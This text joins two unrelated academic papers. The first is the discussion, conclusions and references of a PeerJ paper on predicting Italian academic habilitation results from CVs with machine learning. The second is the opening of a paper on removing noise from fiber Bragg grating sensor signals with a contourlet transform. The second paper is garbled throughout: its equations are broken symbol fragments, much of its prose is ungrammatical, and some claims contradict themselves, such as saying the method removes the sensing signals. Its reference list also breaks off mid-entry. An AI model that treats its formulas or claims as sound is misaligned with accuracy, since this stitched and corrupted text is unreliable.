indicator can be easily computed using the publication list in the candidates’ CVs, the latter (i.e., date of graduation) has to be gathered from external sources. Unfortunately, no freely-available database contains this information. We then had to search the web for authoritative sources (such as professional CVs, personal web pages, etc.) and manually process them to find information about the candidates’ education. For this reason, we decided to focus our analysis on a sample of 50 randomly selected candidates for each of the considered RF. The output test dataset has Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 20/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 Table 6 Comparison of the performances of our model (OUR-SVM) with Tregellas et al.’s (2018) two best models based on linear regression (T-LR) and support vector machines (T-SVM). Best Precision, Recall and F-measure values are in bold. Field Precision Recall F-measure T-LR T-SVM OUR-SVM T-LR T-SVM OUR-SVM T-LR T-SVM OUR-SVM 05/E2 0.649 0.628 0.750 0.750 0.844 0.750 0.696 0.720 0.750 13/A1 0.440 0.550 0.690 0.393 0.393 0.645 0.415 0.458 0.667 been used for our experiment. The results of our model and Tregellas et al.’s (2018) models based on linear regression and SVM classifiers are reported in Table 6. The results show that overall our approach outperforms Tregella’s models. Also in this case there is an exception: the recall value of Tregella’s model based on SVMs in RF 05/E2. However, by analyzing the relative F-measure, we note that Tregella’s overall model accuracy is lower than our model: 0.720 for Tregella’s SVM-based model, and 0.750 for our model. This is caused by the high number of false positives produced by Tregella’s predictive model, which consequently results in lower precision and F-measure values compared to our model. By comparing the F-measure values of the models we observe that Tregella’s models have very low performances in the non-bibliometric RF (13/A1). We also note that, even considering the specific discipline for which Tregella’s models have been designed for (i.e., RF 05/E2 - ‘‘Molecular biology’’, which is a discipline in the the biomedical domain), our model has better performances than two Tregella’s regression models. This confirms that our approach is more stable and general, being able to perform accurate predictions in very different RFs and disciplines. As discussed in the previous experiment, the ability of our models to manage the variability and specificity of different disciplines can be explained by the richness of the features in our datasets, which have been automatically extracted from candidates’ CVs, and that are fundamental to accurately predict the result of complex human processes (such as evaluation procedures). DISCUSSION This research has been driven by the two research questions described in the introduction, and that can be summarized as follows: • RQ1: Is it possible to predict the results of the ASN using only the information contained in the candidates’ CVs? • RQ2: Is it possible to identify a small set of predictors that can be used to predict the ASN results? The analyses presented in ‘Results’ show that machine learning techniques can successfully resolve the binary classification problem of discerning between candidates that attained the habilitation and those who did not on the base of the huge amount of quantitative data extracted from applicants’ CVs with a good accuracy. In fact, the results of the experiments for RQ1 have F-measure values higher 0.6 in 154/184 (83.7%) RFs and in 162/184 (88%) RFs for academic levels I and II, respectively. Moreover, the performances Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 21/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 are very similar and uniform for both bibliometric and non-bibliometric disciplines, and do not show a polarization of the results for the two classes of disciplines. Through an attribute selection process we identified 15 top predictors, and the prediction models based on such predictors resulted to have F-measure values higher than 0.6 in 162/184 (88%) RFs and 163/184 (88.6%) RFs for academic levels I and II, respectively (RQ2). Also in this case, the results are uniform and equally distributed among bibliometric and non-bibliometric disciplines. Some interesting considerations can be made by analyzing and comparing the top 15 predictors for the two academic levels (i.e., associate and full professor). First of all we remark that, as is obvious, many standard bibliometric indicators have been identified as relevant. In particular, seven of them are shared by both associate and full professor levels: the number of publications with impact factor since ever (pub_IF_ALL) and since 2000 (pub_IF_Y12), the number of publications with category (publication_with_category), the cumulative impact factor since ever (IF_ALL) and in 2008-12 (IF_Y5), and the number of journal papers since ever (journal) and since 2000 (journal_Y12) - see Fig. 4. However, we note that the first predictor (i.e., the one selected by the feature selection algorithm for most of the RFs) for both levels is Y_affiliation_same (i.e., the maximum number of years with affiliation to the same university). This is a non-bibliometric indicator which has not been considered by any of the papers reviewed in the ‘Related Work’. We note that this result is coherent with the Italian model of academic careers, which is typically linear and inbreeding-based, meaning that most academics use to stay in the same university from basic studies up to the research career (Aittola et al., 2009). We plan to further investigate the correlation between working for the same institutions and the success to the ASN, and to analyze if there are differences among disciplines. We also remark that there are interesting observations that concern each of the two levels and highlight peculiar aspects of each of them. For instance, we note that the year of birth (born_Y) is among the top 15 predictors for associate professors and not for full professor, suggesting that the age may be a relevant feature for the success at the beginning of an Italian scholar’s career. This result is analogous to the one presented in Tregellas et al. (2018), in which a similar indicator (i.e., the date of graduation) is used for predicting career outcomes of young researchers. Conversely, years_no_pub (i.e., the number of years in which no papers written by the candidate has been published) is a relevant predictor for full professor and not for associate professor. An explanation of this fact is that evaluation committees may have considered continuity in publications as a relevant factor in the evaluation of candidates to the full professor level (e.g., for discerning between candidates who have been active throughout their careers, and those who have not always been productive). Also, in this case, we plan to perform a deeper analysis of this point as future work. An evaluation of the predictive power of our approach has been performed by comparing the results of our models with the best models that have been proposed in the literature to predict academic promotions. The comparison shows that our model outperforms Jensens’ (2009) binomial regression models and Tregella’s models on both bibliometric and non- bibliometric disciplines. This outcome proves that it is possible to predict with a good Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 22/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 accuracy the results of complex human processes such as peer-review assessments through computational methods. Moreover, the performance difference between the approaches is more evident for non-bibliometric disciplines. We observe that the outperformances of our results (overall and for non-bibliometric disciplines) are a straight consequence of the richness and quality of the predictors extracted form candidates’ CVs. An explanation is that models which are mostly based on bibliometric indicators are not able to fully catch and explain all the different factors (e.g., cultural, social, contextual, scientific, etc.) that play a key role in peer-review evaluation processes. CONCLUSIONS The results of this work are encouraging. We remark that the final goal of our work is not substituting evaluation committees by algorithms, but providing tools for supporting candidates, evaluators and policy makers involved in complex assessment processes such as the ASN. A candidate may use our system to self-evaluate his/her CV. Committee members could evaluate the consistency of their decisions across different evaluation sessions. In case of an appeal by rejected candidates to a higher panel, the panel itself could exploit our approach to analyze anomalies. Our system could also be useful for a foreign scholar who could get insight about how his CV is competitive against the Italian benchmarks. Also, policy makers could benefit from a system based on machine learning techniques such as the one presented in this paper in their decisions. At the local level, department heads and university presidents may evaluate people to recruit by guessing if they would be habilitated, since there are incentives. At the national level, the government may consider the results of our analysis to simplify the evaluation process. For instance, it could reduce the paperwork focusing on factors we identified as more relevant. Moreover, as already discussed, our approach would help committee members to minimize anomalies in their decisions. This would have the benefit of minimizing the number of requests of reviews and appeals, saving the time of both academic and administrative staff. Future directions of this research line consists in extending our analysis to more recent sessions of the ASN, and to analyze the impact of mobility on the career of academics. It would also be interesting to consider the applicants that have not been correctly classified by the learner in order to improve the approach and also have a more precise understanding of the factors that have been more relevant for assessments of academics performed by humans such as the ASN. ACKNOWLEDGEMENTS We thank Andrea Bonaccorsi (University of Pisa) and Riccardo Fini (University of Bologna), who provided important considerations and discussions on this work. We would also thank the reviewers for their insightful comments. Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 23/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 ADDITIONAL INFORMATION AND DECLARATIONS Funding This research has been supported by the Italian National Agency for the Assessment of Universities and Research (ANVUR) within the Uniform Representation of Curricular Attributes (URCA) project (see articolo 4 of the ‘Concorso Pubblico di Idee di Ricerca’ - bando ANVUR, 12 February 2015). Paolo Ciancarini was also supported by CINI (ENAV project) and by CNR-ISTC. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Italian National Agency for the Assessment of Universities and Research (ANVUR). CINI (ENAV project). CNR-ISTC. Competing Interests Silvio Peroni is an Academic Editor for PeerJ Computer Science. Author Contributions • Francesco Poggi conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Francesco Poggi is the main contributor of this work and the principal investigator of the project URCA that supported the research presented in this paper. • Paolo Ciancarini and Silvio Peroni authored or reviewed drafts of the paper, approved the final draft. • Aldo Gangemi analyzed the data, authored or reviewed drafts of the paper. • Andrea Giovanni Nuzzolese and Valentina Presutti authored or reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The following GitHub repository contains raw data and code: https://github.com/sosgang/asn2012-analysis. The data/input/ folder contains the input data, and the data/output/ folder contains the output data of the analyses and experiments. The src/ folder contains the Java source code used to perform the analyses and experiments discussed in the paper. The target folder contains a packaged runnable JAR to execute the analyses/experiments. Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 24/28 https://peerj.com https://github.com/sosgang/asn2012-analysis http://dx.doi.org/10.7717/peerj-cs.199 REFERENCES Abramo G, D’Angelo CA, Caprasecca A. 2009. Allocative efficiency in public research funding: can bibliometrics help? Research Policy 38(1):206–215 DOI 10.1016/j.respol.2008.11.001. Aha DW, Kibler D, Albert MK. 1991. Instance-based learning algorithms. Machine Learning 6(1):37–66 DOI 10.1023/A:1022689900470. Aittola H, Kiviniemi U, Honkimäki S, Muhonen R, Huusko M, Ursin J. 2009. The Bologna process and internationalization—consequences for Italian academic life. Higher Education in Europe 34(3–4):303–312 DOI 10.1080/03797720903355521. Aksnes D. 2003. A macro study of self-citation. Scientometrics 56(2):235–246 DOI 10.1023/A:1021919228368. Bornmann L. 2013. How to analyze percentile citation impact data meaningfully in bibliometrics: the statistical analysis of distributions, percentile rank classes, and top-cited papers. Journal of the Association for Information Science and Technology 64(3):587–595 DOI 10.1002/asi.22792. Bornmann L, Daniel H-D. 2006. Selecting scientific excellence through committee peer review—a citation analysis of publications previously published to approval or rejec- tion of post-doctoral research fellowship applicants. Scientometrics 68(3):427–440 DOI 10.1007/s11192-006-0121-1. Bornmann L, Daniel H-D. 2007. Convergent validation of peer review decisions using the h index: extent of and reasons for type I and type II errors. Journal of Informetrics 1(3):204–213 DOI 10.1016/j.joi.2007.01.002. Bornmann L, Haunschild R. 2018. Do altmetrics correlate with the quality of papers? A large-scale empirical study based on F1000Prime data. PLOS ONE 13(5):e0197133 DOI 10.1371/journal.pone.0197133. Bornmann L, Wallon G, Ledin A. 2008. Does the committee peer review select the best applicants for funding? An investigation of the selection process for two European molecular biology organization programmes. PLOS ONE 3(10):e3480 DOI 10.1371/journal.pone.0003480. Breiman L. 2001. Random forests. Machine Learning 45(1):5–32 DOI 10.1023/A:1010933404324. Cronin B, Meho L. 2006. Using the h-index to rank influential information scientists. Journal of the Association for Information Science and Technology 57(9):1275–1278 DOI 10.1002/asi.20354. Danell R. 2011. Can the quality of scientific work be predicted using information on the author’s track record? Journal of the Association for Information Science and Technology 62(1):50–60 DOI 10.1002/asi.21454. Di Iorio A, Peroni S, Poggi F. 2019. Open data to evaluate academic researchers: an experiment with the Italian Scientific Habilitation. In: ISSI 2019-17th international conference on scientometrics and informetrics, conference proceedings. Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 25/28 https://peerj.com http://dx.doi.org/10.1016/j.respol.2008.11.001 http://dx.doi.org/10.1023/A:1022689900470 http://dx.doi.org/10.1080/03797720903355521 http://dx.doi.org/10.1023/A:1021919228368 http://dx.doi.org/10.1002/asi.22792 http://dx.doi.org/10.1007/s11192-006-0121-1 http://dx.doi.org/10.1016/j.joi.2007.01.002 http://dx.doi.org/10.1371/journal.pone.0197133 http://dx.doi.org/10.1371/journal.pone.0003480 http://dx.doi.org/10.1023/A:1010933404324 http://dx.doi.org/10.1002/asi.20354 http://dx.doi.org/10.1002/asi.21454 http://dx.doi.org/10.7717/peerj-cs.199 Franceschet M. 2009. A cluster analysis of scholar and journal bibliometric indicators. Journal of the Association for Information Science and Technology 60(10):1950–1964 DOI 10.1002/asi.21152. Franceschet M, Costantini A. 2011. The first Italian research assessment exercise: a bibliometric perspective. Journal of Informetrics 5(2):275–291 DOI 10.1016/j.joi.2010.12.002. Fu LD, Aliferis CF. 2010. Using content-based and bibliometric features for machine learning models to predict citation counts in the biomedical literature. Scientometrics 85(1):257–270 DOI 10.1007/s11192-010-0160-5. Hall MA, Holmes G. 2003. Benchmarking attribute selection techniques for dis- crete class data mining. IEEE Transactions on Knowledge and Data Engineering 15(6):1437–1447 DOI 10.1109/TKDE.2003.1245283. He H, Garcia EA. 2009. Learning from imbalanced data. IEEE Transactions on Knowledge and Data Engineering 21(9):1263–1284 DOI 10.1109/TKDE.2008.239. Ibáñez A, Armañanzas R, Bielza C, Larrañaga P. 2016. Genetic algorithms and Gaussian Bayesian networks to uncover the predictive core set of bibliometric indices. Journal of the Association for Information Science and Technology 67(7):1703–1721 DOI 10.1002/asi.23467. Jensen P, Rouquier J-B, Croissant Y. 2009. Testing bibliometric indicators by their prediction of scientists promotions. Scientometrics 78(3):467–479 DOI 10.1007/s11192-007-2014-3. John GH, Langley P. 1995. Estimating continuous distributions in Bayesian classifiers. In: Proc. 11th conference on uncertainty in artificial intelligence. Burlington: Morgan Kaufmann, 338–345. Keerthi SS, Shevade SK, Bhattacharyya C, Murthy KRK. 2001. Improvements to Platt’s SMO algorithm for SVM classifier design. Neural Computation 13(3):637–649 DOI 10.1162/089976601300014493. Law. 2011. Rules concerning the organization of the universities, academic employees and recruitment procedures, empowering the government to foster the quality and efficiency of the university system (Norme in materia di organizzazione delle università, di personale accademico e reclutamento, nonche’ delega al Governo per incentivare la qualità e l’efficienza del sistema universitario), Gazzetta Ufficiale n. 10 del 14 gennaio 2011 - Suppl. Ordinario n. 11. Available at http://www. gazzettaufficiale.it/eli/id/2011/01/14/011G0009/sg (accessed on 17 March 2019). Leydesdorff L. 2009. How are new citation-based journal indicators adding to the bib- liometric toolbox? Journal of the Association for Information Science and Technology 60(7):1327–1336 DOI 10.1002/asi.21024. Lindahl J. 2018. Predicting research excellence at the individual level: the impor- tance of publication rate, top journal publications, and top 10% publications in the case of early career mathematicians. Journal of Informetrics 12(2):518–533 DOI 10.1016/j.joi.2018.04.002. Marzolla M. 2015. Quantitative analysis of the Italian national scientific qualification. Journal of Informetrics 9(2):285–316 DOI 10.1016/j.joi.2015.02.006. Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 26/28 https://peerj.com http://dx.doi.org/10.1002/asi.21152 http://dx.doi.org/10.1016/j.joi.2010.12.002 http://dx.doi.org/10.1007/s11192-010-0160-5 http://dx.doi.org/10.1109/TKDE.2003.1245283 http://dx.doi.org/10.1109/TKDE.2008.239 http://dx.doi.org/10.1002/asi.23467 http://dx.doi.org/10.1007/s11192-007-2014-3 http://dx.doi.org/10.1162/089976601300014493 http://www.gazzettaufficiale.it/eli/id/2011/01/14/011G0009/sg http://www.gazzettaufficiale.it/eli/id/2011/01/14/011G0009/sg http://dx.doi.org/10.1002/asi.21024 http://dx.doi.org/10.1016/j.joi.2018.04.002 http://dx.doi.org/10.1016/j.joi.2015.02.006 http://dx.doi.org/10.7717/peerj-cs.199 Ministerial Decree 159. 2012. Redefinition of scientific disciplines (Rideterminazione dei settori concorsuali), Gazzetta Ufficiale Serie Generale n. 137 del 14-06-2012—Suppl. Ordinario n. 119). Available at http://www.gazzettaufficiale.it/eli/id/2012/06/14/ 12A06786/sg (accessed on 17 March 2019). Nederhof AJ, Van Raan AF. 1987. Peer review and bibliometric indicators of scientific performance: a comparison of cum laude doctorates with ordinary doctorates in physics. Scientometrics 11(5–6):333–350 DOI 10.1007/BF02279353. Norris M, Oppenheim C. 2003. Citation counts and the Research Assessment Exercise V: Archaeology and the 2001 RAE. Journal of Documentation 59(6):709–730 DOI 10.1108/00220410310698734. Nuzzolese AG, Ciancarini P, Gangemi A, Peroni S, Poggi F, Presutti V. 2019. Do altmetrics work for assessing research quality? Scientometrics 118(2):539–562 DOI 10.1007/s11192-018-2988-z. Peroni S, Ciancarini P, Gangemi A, Nuzzolese AG, Poggi F, Presutti V. 2019. The practice of self-citations: a longitudinal study. ArXiv preprint. arXiv:1903.06142 (accessed on 17 March 2019). Poggi F, Ciancarini P, Gangemi A, Nuzzolese AG, Peroni S, Presutti V. 2018a. Pre- dicting the results of evaluation procedures of academics: additional materials. DOI 10.6084/m9.figshare.6814550. Poggi F, Ciancarini P, Gangemi A, Nuzzolese AG, Peroni S, Presutti V. 2018b. Predicting the results of evaluation procedures of academics: appendices. DOI 10.6084/m9.figshare.6814502. Poggi F, Cigna G, Nuzzolese AG. 2016. Enhancing open data to linked open data with ODMiner. In: LD4IE@ISWC. 44–50. Available at http://ceur-ws.org/Vol-1699/paper- 06.pdf (accessed on 17 March 2019). Quinlan JR. 2014. C4.5: programs for machine learning. San Mateo: Elsevier. Taylor J. 2011. The assessment of research quality in UK universities: peer review or metrics? British Journal of Management 22(2):202–217 DOI 10.1111/j.1467-8551.2010.00722.x. Tregellas JR, Smucny J, Rojas DC, Legget KT. 2018. Predicting academic career out- comes by predoctoral publication record. PeerJ 6:e5707 DOI 10.7717/peerj.5707. Van Raan AF. 2006. Comparison of the Hirsch-index with standard bibliometric indicators and with peer judgment for 147 chemistry research groups. Scientometrics 67(3):491–502 DOI 10.1556/Scient.67.2006.3.10. Vieira ES, Cabral JA, Gomes JA. 2014a. Definition of a model based on bibliometric indicators for assessing applicants to academic positions. Journal of the Association for Information Science and Technology 65(3):560–577 DOI 10.1002/asi.22981. Vieira ES, Cabral JA, Gomes JA. 2014b. How good is a model based on bibliometric indicators in predicting the final decisions made by peers? Journal of Informetrics 8(2):390–405 DOI 10.1016/j.joi.2014.01.012. W3C OWL Working Group. 2012. OWL 2 Web Ontology Language. Available at https: //www.w3.org/TR/owl2-overview/ (accessed on 17 March 2019). Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 27/28 https://peerj.com http://www.gazzettaufficiale.it/eli/id/2012/06/14/12A06786/sg http://www.gazzettaufficiale.it/eli/id/2012/06/14/12A06786/sg http://dx.doi.org/10.1007/BF02279353 http://dx.doi.org/10.1108/00220410310698734 http://dx.doi.org/10.1007/s11192-018-2988-z http://arXiv.org/abs/1903.06142 http://dx.doi.org/10.6084/m9.figshare.6814550 http://dx.doi.org/10.6084/m9.figshare.6814502 http://ceur-ws.org/Vol-1699/paper-06.pdf http://ceur-ws.org/Vol-1699/paper-06.pdf http://dx.doi.org/10.1111/j.1467-8551.2010.00722.x http://dx.doi.org/10.7717/peerj.5707 http://dx.doi.org/10.1556/Scient.67.2006.3.10 http://dx.doi.org/10.1002/asi.22981 http://dx.doi.org/10.1016/j.joi.2014.01.012 https://www.w3.org/TR/owl2-overview/ https://www.w3.org/TR/owl2-overview/ http://dx.doi.org/10.7717/peerj-cs.199 Wouters P, Thelwall M, Kousha K, Waltman L, De Rijcke S, Rushforth A, Franssen T. 2015. The metric tide: Correlation analysis of REF2014 scores and metrics (Supplementary Report II to the Independent Review of the Role of Metrics in Research Assessment and Management). London: Higher Education Funding Council for England (HEFCE) DOI 10.13140/RG.2.1.3362.4162. Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 28/28 https://peerj.com http://dx.doi.org/10.13140/RG.2.1.3362.4162 http://dx.doi.org/10.7717/peerj-cs.199 work_omyh7hfb2nd3flb4xlfcn3huhm ---- International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 87 Research on Noise Removal in Fiber Grating Sensing Signal Xiaobo Zhou * Xijing university, Xi’an, china e-mail: 369146317@qq.com Abstract—Signal processing is one of the key technology of fiber grating sensor, noise interference on signal transmission, influence of fiber grating sensor practical application effect, in order to solve the noise problem of fiber grating sensing signal, design a denoising method of fiber grating sensing signal based on improved contourlet transform. The acquisition of fiber grating sensing signal firstly, and remove the unwanted signal, select the useful signal, then using contourlet transform, by filtering the noise filter, finally through the concrete experiment to test the effect of denoising. The results show that the improved contourlet transform can completely remove the fiber Bragg grating sensing signals, and improve the quality of FBG sensor communication, and verify the effectiveness of the proposed method. Keywords-Fiber Grating; Sensing Signal; Noise Interference; Contourlet Transform; Filter I. INTRODUCTION With the continuous development of optical communication technology, fiber grating sensing technology obtained the unprecedented development of fiber Bragg grating sensor with strong ability of resisting electromagnetic interference resistance to corrosion, high sensitivity, small body Low cost advantages, has the incomparable advantages of traditional sensors, in the national defense military aerospace and other fields has been widely used in [1-3] in the practical application of fiber Bragg grating sensor and sensing signal is very susceptible to noise interference, the measurement precision of the fiber Bragg grating sensor is affected, so to remove the noise of the fiber Bragg grating sensor research has the vital significance. At home and abroad in recent years, some studies mechanism of fiber Bragg grating sensor signal denoising studies [7, 8], but the study also not enough in-depth the earliest using Fourier transform to deal with the noise of the fiber Bragg grating sensor signal, in order to improve the quality of the fiber Bragg grating sensor signals, but as a result of the Fourier transform of signal decomposition scale is coarser, cannot effectively eliminate the noise of the fiber Bragg grating sensor signal [9-11] In order to solve the limitations of Fourier transform, some scholars wavelet transform denoising method was adopted to realize FBG sensing signal quality of ascension, the decomposition scale is more detailed, more thoroughly remove noise, but the algorithm of wavelet threshold denoising process, the threshold selection is critical, whether hard or soft threshold threshold was adopted to realize, the current disagreed on threshold selection criteria, and the implementation process is very complicated, not easy to operation. Outline of the wavelet transform is a method of multi-scale decomposition can effective denoising signal in noise, in order to solve the problem of the current fiber Bragg grating sensor signal noise, design a fiber Bragg grating sensor based on contour wavelet transform signal denoising method, the experimental results, improve the outline of the wavelet transform can eliminate noise in the fiber Bragg grating sensor signals, won the high quality of the grating sensor signal. II. WORKING PRINCIPLE OF FIBER GRATING SENSING Fiber Bragg grating sensor is a kind of wavelength modulated sensor. As the wavelength is a constant, it is not affected by the optical fiber loss and energy of the light source, so its performance is better than other types of fiber sensor. Its working principle is shown in figure 1. DOI: 10.21307/ijanmc-2019-026 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 88 Figure 1. WorkingPrinciple of Fiber Grating Sensing Appens, reflection wavelength will have corresponding change, so that we can according to the detection wavelength to be the measured value of the fiber grating, such as temperature and pressure center wavelength drift (  ) and the relationship between the longitudinal strain (  ) can be described as (1 )B e B P         1 / e P dn d n   denotes the elastic modulus. The relationship between the center wavelength drift (  ) and temperature change ( T ) of the FBG can be described as ( )B t B T          t  And  respectively represent the coefficient of thermal expansion and the coefficient of thermal light. The relationship between the center wavelength drift (  ) and pressure change ( P ) of the fiber Bragg grating is ( ) 1 1n n P n P n P                      Let E be the elastic modulus of the fiber Bragg grating, and the formula for calculating the refractive index change of the fiber Bragg grating is (1 2 )L v P L E     2 12 11 (1 2 )(2 ) 2 n n P v n E        In the process of fiber Bragg grating sensing, the refractive index is related to many factors, especially the interference of noise is the biggest, which brings adverse effects to the measurement results such as temperature and pressure. For this reason, contour transformation is introduced in this paper to carry out denoising processing on the fiber Bragg grating sensing signal, so as to improve the measurement accuracy such as temperature and pressure. III. THE METHOD OF RASTER SENSING SIGNAL DENOISING BY CONTOURLETTRANSFORM A. Contourlet Transform Aiming at the limitation of the wavelet transform, some scholars raised the outline of the wavelet transform, this method can from two aspects of measure frequency, by the signal processing has a certain direction, make the effective signal to concentrate for a signal containing noise, outline of the wavelet transform of the original signal by base structure approaching, outline of the wavelet transform at the same time also has a certain anisotropic characteristics through the Laplacian pyramid to multi-scale decomposition of noise signal, find some of the specific signal and noise, through the direction of the filter to filter noise operation, after denoising International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 89 signal Firstly, the fiber Bragg grating sensor signal is sampled and the low frequency information of the fiber Bragg grating sensor signal is obtained. Then, the fiber Bragg grating sensor signal is sampled, and the high frequency information of the fiber Bragg grating sensor signal is obtained. In figure 2, X represents the fiber Bragg grating sensor signal, and H G is a low-pass filter. H ¯M M G - x a b + H ¯M M G+- x a b + (a) Decomposition of fiber Bragg grating signals (b) Reconstruction of fiber Bragg grating signals Figure 2. Diagram of decomposition and reconstruction of fiber Bragg grating signals The process of three-level directional subband division of direction filter is shown in figure 3. The sub-bands of the upper level are sampled by resampling operator and the sampling results are output. Figure 3. Subband division of direction filter B. The De-noising Principle of Fiber Bragg grating (FBG) Sensor in Contour Wave Transform As the useful FBG sensor signal and noise show different characteristics in contour wave transformation, the FBG sensor signal is transformed in different levels, and the noise in the FBG sensor signal is removed according to the appropriate threshold value. Set the original fiber Bragg grating sensor signal  ( ); 1, 2, ,g x x N  ,Signal with noise fiber grating sensor  ( ) ( ) ( ); 1, 2, ,f x g x N x x N    ,Where, the mean value of noise is 0, the variance is 2  , and the formula for calculating the standard deviation of each layer is 1,2, , ( ( ) ) ˆ ( ) 0.5 f j J Median w j j     ( ) f w j means the decomposition coefficient of the ( )f x JTH layer. C. Selection of Threshold Value of Signal Denoising by Fiber Bragg Grating Sensor There are many threshold selection methods for contour wave transformation. Due to the universal and easy implementation of the Universe threshold method, this paper selects the Universe threshold method to determine the threshold of the optical fiber grating sensor signal denoising, and the high-frequency sub-band threshold of the Universe threshold method is determined as follows ( ) ( ) 2 lg( ( ) * ( ))TH j j M j N j  Where, ( ) * ( )M j N j represents the number of contour wave decomposition coefficients of j layer. ( ) * ( )M j N j ,the larger the size, the denoising threshold will set the high frequency coefficient of the decomposition result of the fiber Bragg grating sensor to 0. In this way, a large number of useful fiber Bragg grating sensor signals will be removed. Therefore, equation (7) will be corrected as follows ( ) ( ) ( ) * ( ) TH j TH j M j N j   D. The Process of Signal Denoising by Fiber Bragg Grating Sensor Step1: contour wave transform is performed on signal f(x) of fiber Bragg grating sensor with noise. The coefficients of contour transform domain are as follows: ( ( )) _ _w CT f x CT f CT n    Step2: according to the denoising rules, the contour transformation coefficient ( ŵ ) of the original image g(x) is International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 90 obtained by applying the denoising rules to the original optical fiber grating sensor signal w. The denoising rules are as follows: , ( ) ˆ 0, ( ) w if w TH j w if w TH j       Step3: perform contour wave reconstruction and transformation on the estimated value ŵ of contour wave transform coefficient, and obtain the signal of fiber Bragg grating sensing '( )g x after de-noising. 1 ˆ( )g x CT w    IV. TEST AND ANALYSIS OF THEDENOISING EFFECT OF FIBER BRAGG GRATING SENSOR A. The Signal of Fiber Grating Sensor WithNoise In order to analyze the denoising effect of the fiber Bragg grating sensing signal of contour wave transform, Matlab 2014 was used as the test platform to conduct the denoisingexperiment. The signal of fiber grating sensor with noise is shown in figure 4. Figure 4. The signal of fiber grating sensor with noise B. Results and Analysis 1) The denoising effect of this paper. Contour wave transform is used to de-noising the signal-sensing signal of the fiber Bragg grating containing noise in figure 4. The signal-sensing signal of the fiber Bragg grating after de-noising is shown in figure 5. As can be seen from figure 5, contour wave transform can remove the noise in the fiber Bragg grating sensing signal very well and improve the quality of the fiber Bragg grating sensing signal. It is an effective method to remove noise from the fiber Bragg grating sensing signal. Figure 5. The denoising results of fiber Bragg grating sensor in contour wave transform 2) Performance Comparison with Current Classical Methods. In order to test the advantage of contour wave transform in denoising, wavelet transform [16] and literature [17] were used for comparison experiments, and peak signal to noise ratio (PSNR) and root mean square error (MSE)[18] were used to evaluate the result of signal de-noising of fiber Bragg grating sensor. PSNR and MSE of fiber Bragg grating sensor after de-noising were shown in table 1. Can be seen from table 1, the outline of the fiber Bragg grating sensor signals after wavelet transform denoising PSNR, said fiber Bragg grating sensor signal quality is better, noise removal more thoroughly, and contrast methods cannot completely eliminate the noise in the fiber Bragg grating sensor signals effectively, the interferences with fiber Bragg grating sensor measurement accuracy, MSE is far less than contrast method at the same time, said contour wavelet transform denoising results more stable, and the method of denoising time is shorter, can satisfy the mass of fiber Bragg grating sensor signal denoising practical application requirements. TABLE.I. COMPARES THE PERFORMANCE OF THE CLASSICAL RASTER SENSING SIGNAL DE-NOISING METHOD Denoising method PSNR MSE The wavelet transform 20.33 8.00 The literature[17] 22.19 7.72 Contour wave transform 24.73 7.24 V. SUMMARY Serious impact on the quality of the fiber Bragg grating signal noise, its application scope and bring certain actual application value of interference, in order to eliminate the adverse effect, was proposed based on wavelet transform outline of fiber grating sensing signal denoising method, according to outline the multi-scale wavelet transform and directional advantages, the fiber Bragg grating sensor signal decomposition, found in the decomposition of the signal noise data, and through the corresponding filter to remove noise, and through the inverse operation outline of the wavelet transform denoising signal after refactoring, improves the signal-to-noise ratio of the fiber Bragg grating sensor signals, and compared with other denoising method has carried on the experiment. The contrast method can International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 91 remove some useful signals while removing noise, while the method in this paper may keep the useful signal as much as possible, and at the same time improve the real-time performance of the fiber Bragg grating sensing signal. ACKNOWLEDGEMENT Xijing University Scientific Research Foundation Project(XJ140236). REFERENCES [1] L Li ,A J Xia : The advantages and applications of fiber Bragg grating sensing technology [J]. Optical communication technology, 2007(7): 62-64. [2] K.W. Zhang, S.W. Zhang and S. X.Zhao: Application of fiber Bragg grating strain sensor in bridge structure monitoring [J]. Optical instrument, 2014, 36(1):15-19. [3] A.Q. LI, G.D.ZHOU: Research progress and prospect of optical fiber Bragg sensor testing technology [J]. Journal of southeast university (natural science edition),2009,39(6):1298-1306. [4] Jeanno F, Joel C, John B: Low energy impact damage monitoring of composites using dynamic strain signals from FBG sensors-part II: damage identification [J]. Composite Structures, 2012,94:593-600. [5] Z. Q.LIN, H. YANG and H.S. CHEN: Temperature compensation of fiber grating strain sensor [J]. Journal of southeast university (natural science edition), 2007, 37(2): 310-314. [6] C.XNING, S.S. ZHANG :Experimental study on temperature compensation of fiber grating [J]. Journal of hebei university of science and technology, 2006, 27(2): 155-157. [7] P.X.ZHENG, Y.L. SONG and D.S. ZHANG: Experimental study on temperature and strain sensing characteristics of fiber Bragg grating [J]. Instrument technology and sensor,2008,22(11):12-15. [8] X.F. ZHOU,L.LIANG: Experimental study on stability of fiber Bragg grating sensor [J]. Sensor and microsystem, 2007, 26(11): 25-27. [9] Loutas T H, Kostopoulos V, Ramirez-Jimenez C, et al: Damage evolution in center-holed glass/polyester composites under quasi-static loading using time/frequency analysis of acoustic emission monitored waveforms [J]. Composite Science and Technology, 2006, 66:1366-1375. [10] L.Q.HOU,X.F.ZHAO;Z.P.LENG andT.SUN :Improved calculation value of temperature compensation of fiber Bragg grating strain sensor [J]. 